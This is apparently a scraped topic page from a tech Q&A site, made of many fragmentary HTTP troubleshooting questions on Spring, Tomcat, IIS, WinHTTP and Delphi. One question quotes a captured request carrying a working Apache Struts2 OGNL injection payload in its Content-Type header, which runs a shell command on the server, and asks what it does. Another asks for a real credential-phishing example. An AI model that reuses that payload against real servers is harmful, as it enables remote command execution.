HTTP Protocol

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text. HTTP is the protocol to exchange or transfer hypertext. HTTP functions as a request-response protocol in the client-server computing model. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet Protocol Suite; it presumes an underlying and reliable transport layer protocol.

Share tech news, updates, or what's on your mind.

Sign up to Post

Dear sirs,
I am setting up a global exception handler in Spring. Once an exception is caught, a method in the @ControllerAdvice is called in, and returns a specific view with exception details. Among info returned with the view, I have the HttpStatus, that can get. Actually I keep getting 200, while the right HttpStatus should be 500, 404, etc.
Here is my code
public class AppGlobalExceptionHandler {
       * Note: You can either point to Exception Types or Http ResponseStatus
       * @ExceptionHandler({MyException.class})
       * public String ...
       * @ExceptionHandler
       * @ResponseStatus(HttpStatus.INTERNAL_SERVER_ERROR)
       * public String
       * */
      public String handleAnyException(Exception exception, Model model,
                  HttpServletRequest request, HttpServletResponse response) {
            log.error("Request raised " + exception.getClass().getSimpleName());
            String details = ExceptionUtils.getStackTrace(exception);
            AppError error = new AppError();
            model.addAttribute(AppStringHandler.VARIABLE_URL_SUBMIT, AppStringHandler.URL_TASKS_SEND_EMAIL_500);
            model.addAttribute(AppStringHandler.VARIABLE_URL_REDIRECT, AppStringHandler.URL_ADMIN_REDIRECT);
            model.addAttribute(AppStringHandler.VIEW_ERROR_MODEL_ATTRIBUTE, error);
Get expert help—faster!
LVL 12
Get expert help—faster!

Need expert help—fast? Use the Help Bell for personalized assistance getting answers to your important questions.

I have Tomcat 8.0.35 running, web application running from IntelliJ IDEA 2017.3.3 (build successful and WAR deployed) but the browser (I tried with Chrome, Firefox, and IE) is showing HTTP Status 404 when I try to access http://localhost:8080/ or

I built my web application with Maven as WAR. The WAR file was successfully deployed in Tomcat's "/webapps/ROOT" directory and "index.html" and "index.jsp" are there and at the end of the deployment the browser page is open.

Tomat is configured to default ports: 8080, 8081, 8009.
Good news! Plesk 12.5 (with update #28 and above) now includes support for HTTP/2. This is a major update to HTTP1.1, which is over 15 years old. Read below to learn how to enable HTTP/2 on your Media Temple DV with Plesk.
Our mobile app is experiencing a strange behavior in a place where they have WiFi. If the app uses THAT WiFi there's an HTTP POST request (to our API) that gets the response content truncated randomly (not always truncated, and if truncated not always at the same place).

I made several tests at that place (using the app and also Postman) and found that on mobile data the response always comes OK, but when connecting with that WiFi the response sometimes gets truncated. Also, I saw that other API requests get the response correctly, even when the content length is 10 times bigger (I thought that maybe the response was too big, but we're talking about just 10Kb).

The failing request is a regular POST request sent to a REST API made with Dropwizard. The request gets processed correctly on the server, which returns status 200 and the content. The client gets the status 200 but the content is truncated, so the whole operation can't be finished.

I wonder if there's something wrong with that WiFi, or if this kind of response errors must be expected and dealt by our application. I haven't seen this behavior before.
what are difference between http post and get, as far as what/how data is passed in a http request.
Reason I'm asking is, I created a simple ASP.NET MVC application. I have two methods (shown below, example contrived for this question). one method is decorated with [HttpPost] and other one is not. when i make a call from a third party app, it hits the break point in the first function ProcessData1 and I get the id parameter as well, since it is being passed in query string.
but if i try to make a call to ProcessData2, it doesn't hit the break point in that function.
I know the third party application, I'm using is making a Http post call.
I tried another rest client and this time when I made a call to ProcessData2, it was successful.

can some one point out possible reasons?

        public ActionResult ProcessData1(string id) {          
            return View(request);

        public ActionResult ProcessData2() {          
            return View(request);
I want to create an IIS URL rewrite rule which should make the site to respond with the same content on any request. This rule is to be applied when the site goes under a maintenance.
My rule looks like the following:
                <rule name="Stub" enabled="true" patternSyntax="ECMAScript" stopProcessing="true">
                    <match url=".*" />
                    <action type="Rewrite" url="/maintenance.htm?URL={R:0}" appendQueryString="true" logRewrittenUrl="true" />
                        <add input="{REMOTE_ADDR}" pattern="" negate="true" />
                        <add input="{REMOTE_ADDR}" pattern="172.31.3" negate="true" />

Open in new window

It works perfectly for any request to resources in the root folder. But on any request to a sub-directory the server responds with 403 Forbidden

For example, a request like correctly returns the content of the file maintenance.htm (located in the site's root folder), but a request like  returns
 <h2>403 - Forbidden: Access is denied.</h2>
  <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>

Open in new window

(there is a file /2/s.gif and it is correctly returned when the rule is disabled).
In the W3SVC log file I can see:
2017-12-20 22:01:36 GET /maintenance.htm URL=2/s.gif 443 - Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:52.0)+Gecko/20100101+Sea-Monkey/2.49.1+(similar+to+Firefox/52.0) - 403 18 0 78

Open in new window

Please help.
I am doing an HTTP post call to a database to pull information to load an audio player.

I am successful getting a JSON string with the desired details.

What I'm having trouble with is passing one of the JSON variables to the audio player as the source.

Here's a bit of code that shows what I'm trying to do.


<audio id="player" my-audio>
    <source src="/radio/{{dir.dv_file}}.ogg" type="audio/ogg" />
    <source src="/radio/{{dir.dv_file}}.mp3" type="audio/mpeg" />

Open in new window

So what works is the <h1> tag that displays the Talent Name and the <h2>Tag that gives the total time.  I also know there is valid data for dir.dv_file but when I inspect the code, it shows it as {{dir.dv_file}}.

So what that indicates to me is that the {{dir.dv_file}} is not converted to the passed variable inside of the <audio> tag.

So my question is how do I get that variable to be passed within that <audio> tag.
My question is about:

They're saying:

The problem with that line of reasoning is that HTTP versions aren’t black and white like this; just because something advertises itself as HTTP/1.0, doesn’t mean it doesn’t understand HTTP/1.1 (see RFC2145 for more).

But here they are saying:

If a response includes both an Expires header and a max-age directive, the max-age directive overrides the Expires header, even if the Expires header is more restrictive. This rule allows an origin server to provide, for a given response, a longer expiration time to an HTTP/1.1 (or later) cache than to an HTTP/1.0 cache.

So or the article is incorrect, or W3 is incorrect (or I'm wrong :p). With the last sentence, W3 means you can give a different expiration time to a HTTP/1.1 cache (or later), compared with a HTTP/1.0 cache. You can do this by using max-age and the Expires header.
So they can only say something like that, by assuming the HTTP/1.0 cache will ignore the max-age, because otherwise you will just have the same expiration time for all the caches (HTTP/1.0 and HTTP/1.1 et cetera).

So what is true about HTTP/1.0 caches understanding max-age?

In this sample GET request

GET / HTTP/1.1
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(,#ros)).(#ros.flush())}
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Connection: Keep-Alive

The content-type begins with something that is not normal. Is it trying to get the webserver to process it and execute something?  I also see java.lang so it is trying to call a java function.   What is it trying to do with java?

What is it doing with the command prompt and shell bash command prompt?

What is the purpose of echoing STRUSTS2045?
This is a great video (however the links no longer work):
I need a real life example of IF someone clicks on a bad link via email or whatever avenue how the redirected website collects their credentials. Anyone have any good ones?

Hire Technology Freelancers with Gigs
LVL 12
Hire Technology Freelancers with Gigs

Work with freelancers specializing in everything from database administration to programming, who have proven themselves as experts in their field. Hire the best, collaborate easily, pay securely, and get projects done right.

Hi ,

We have enabled Mapi over HTTP and its set to true.
Internal all working but external i forgot to set the in it so i did sucsesfull.

Now i need to set per server the authentication method as its asking from outside a password to fill in.

What will be the correct command and correct or stanaard authenthication settings?
Many thanks.

It should be something like ?

Set-MapiVirtualDirectory -Identity "Servernameexchange01\mapi (Default Web Site)" -ExternalUrl -IISAuthenticationMethods Negotiate
(not sure)
Many thanks.
Hello , does anyone knwo how to transfer iPhone contacts and messages to Android phone without any loss ? i've tried many ways to transfer them , but always fail ,and i don't how to connect the differen operation phones ,
Hi All,

I have configured Issuing CA and Web server.

Issuing CA Roles (Certificate Authority)
Web server (Certificate Authority Web enrollment Service and OCSP)

When I try requesting a certificate directly through (http://issuingCA/certsrv) it is working fine the certificate can be issued through web console

While I try request using (https://webserver/certsrv) Everything is coming finally when i click submit on certificate request it through below error.

Error : CCertRequest::Submit: The RPC server is unavailable. 0x800706ba (WIN32: 1722

It is critical and really appreciated if any one can help this...

I'm working with an ecommerce API. Once the transaction is processed an HTTP post is sent to a URL of your choice with the transaction data (a way to confirm transaction on your site). This is fine, however how can I confirm the HTTP post is from the applicable source for security purposes? I tried $_SERVER['HTTP_REFERER'] but nothing is provided.
how can I disable HTTPS and enable HTTP on apache Tomcat?
Based on my researches I have to modify the server.xml in the root folder of apache tomcat. Must I modify the connector? how?
For my Webapplication I'm connecting to the port 8443
<?xml version='1.0' encoding='utf-8'?>
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  See the License for the specific language governing permissions and
  limitations under the License.
<!-- Note:  A "Server" is not itself a "Container", so you may not
     define subcomponents such as "Valves" at this level.
     Documentation at /docs/config/server.html
<Server port="-1" shutdown="SHUTDOWN">
  <!-- Security listener. Documentation at /docs/config/listeners.html
  <Listener className="" />
  <!--APR library loader. Documentation at 

Open in new window

How to display html detail when clicking submipls
In internet explorer i am able to access a https site and download a file. i have to use an username and password to access the site first.
However, when i enter the URL and credentials in SSIS using the HTTP connection managerand press the test connection button,  i get the message:

The remote server returned an error: (401) Unauthorized.

Any ideas why this is happening. The username and password are correct.

Can i use an https site in a http connection?

Any help appreciated.

I would like to understand the difference of persistent connection and keep alive. Is it only applicable to HTTP protocol? Thanks!
I created an htaccess file in my directory for with the following:

order deny,allow
deny from all
allow from

Open in new window

When trying to visit from my IP I get a testing 123... page if you visit link above you will see.   If I remove the .htaccess file I have full access again without any problem.  What am I doing wrong?  Do I need to use ipv6 address or something?
Upgrade your Question Security!
LVL 12
Upgrade your Question Security!

Your question, your audience. Choose who sees your identity—and your question—with question security.

I am trying to access a website through proxy server.I am using httpclient.

This is the code which is working fine:

import org.apache.commons.httpclient.Credentials;
import org.apache.commons.httpclient.HostConfiguration;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.HttpMethod;
import org.apache.commons.httpclient.HttpStatus;
import org.apache.commons.httpclient.UsernamePasswordCredentials;
import org.apache.commons.httpclient.auth.AuthScope;
import org.apache.commons.httpclient.methods.GetMethod;
import java.util.Properties;

public class Working {
private static  String PROXY_HOST = "";
private static  int PROXY_PORT = 80;

    public static void main(String[] args) {
    HttpClient client = new HttpClient();
    HttpMethod method = new GetMethod("");
    HostConfiguration config = client.getHostConfiguration();
    config.setProxy(PROXY_HOST, PROXY_PORT);

    try {
            if (method.getStatusCode() == HttpStatus.SC_OK) {
           String response = method.getResponseBodyAsString();
           System.out.println("Response = " + response);
    } catch (IOException e) {
    } finally {
Hi Guys,

We wrote an application that downloads json files down to about 80/90 client machines, we have reworked the mechanism but cant get it work correctly

I want to know how we could enable our server to send http status code responses then I can use the reponse.statusCode to see if a new file is available and make this whole thing a lot easier and more robust.
We just moved from WinINET to WinHTTP. The latter does not have an equivalent InternetCanonicalizeUrl function.

The WinHTTP docs say that WinHTTPOpenRequest does this automatically but there is nothing there that specifically addresses this.

According to this reference you can use WinHTTPCreateURL which uses a URL_COMPONENTS structure to define the various URL parts. In the latter the lpszExtraInfo property is where you put the ?param=xyz& ... part.

Here is my problem - one of the parameters in the paramter string needs to be canonicalized as it could contain non-URL friendly characters (Example &).

With the WinINET version we used InternetCanonicalizeUrl on the specific URL parts which were then appended to the URL string.

If we have a URL now that looks like this'Name & Surname','Description'

Open in new window

And we pass that to WinHTTPOpenRequest - it does not know that the & in Name & Surname is data and not a parameter separator.

How do we canonicalize individual parameters in the URL with WinHTTP
I would like to setup redirection from a server that host a site to a different server that host a landing page in IIS.  

How do I setup a redirection in DNS and on the new site?

I have used 3 set of codes(where I used Indy10.6.2 component), which doesn't show any errors, but i can't able to send SMS through the code. Please help me to send me the Sms through Delphi code

The code which I used is...

  URL = '****&hash=****&sender=TXTLCL&numbers=9198........&message=HISUNDAR';
  //URL = '*****&hash=******&sender=TXTLCL&numbers=9198...&message=HISUNDAR';
  ResponseSize = 1024;
  hSession, hURL: HInternet;
  Request: String;
  ResponseLength: Cardinal;
  hSession := InternetOpen('TEST', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
    Request := Format(URL,[Username,Password,Sender,Numbers,HttpEncode(Message1)]);
    hURL := InternetOpenURL(hSession, PChar(Request), nil, 0,0,0);
      SetLength(Result, ResponseSize);
      InternetReadFile(hURL, PChar(Result), ResponseSize, ResponseLength);
      SetLength(Result, ResponseLength);

http : TIdHTTP;
IdSSL : TIdSSLIOHandlerSocketOpenSSL;
 http := TIdHTTP.Create(nil);
 IdSSL := TIdSSLIOHandlerSocketOpenSSL.Create(nil);
  Http.ReadTimeout := 30000;
  Http.IOHandler := IdSSL;
  IdSSL.SSLOptions.Method := sslvTLSv1;
  Http.Request.BasicAuthentication := True;
 // IdSSL.SSLOptions.Method := sslvTLSv1;

HTTP Protocol

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text. HTTP is the protocol to exchange or transfer hypertext. HTTP functions as a request-response protocol in the client-server computing model. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet Protocol Suite; it presumes an underlying and reliable transport layer protocol.

Top Experts In
HTTP Protocol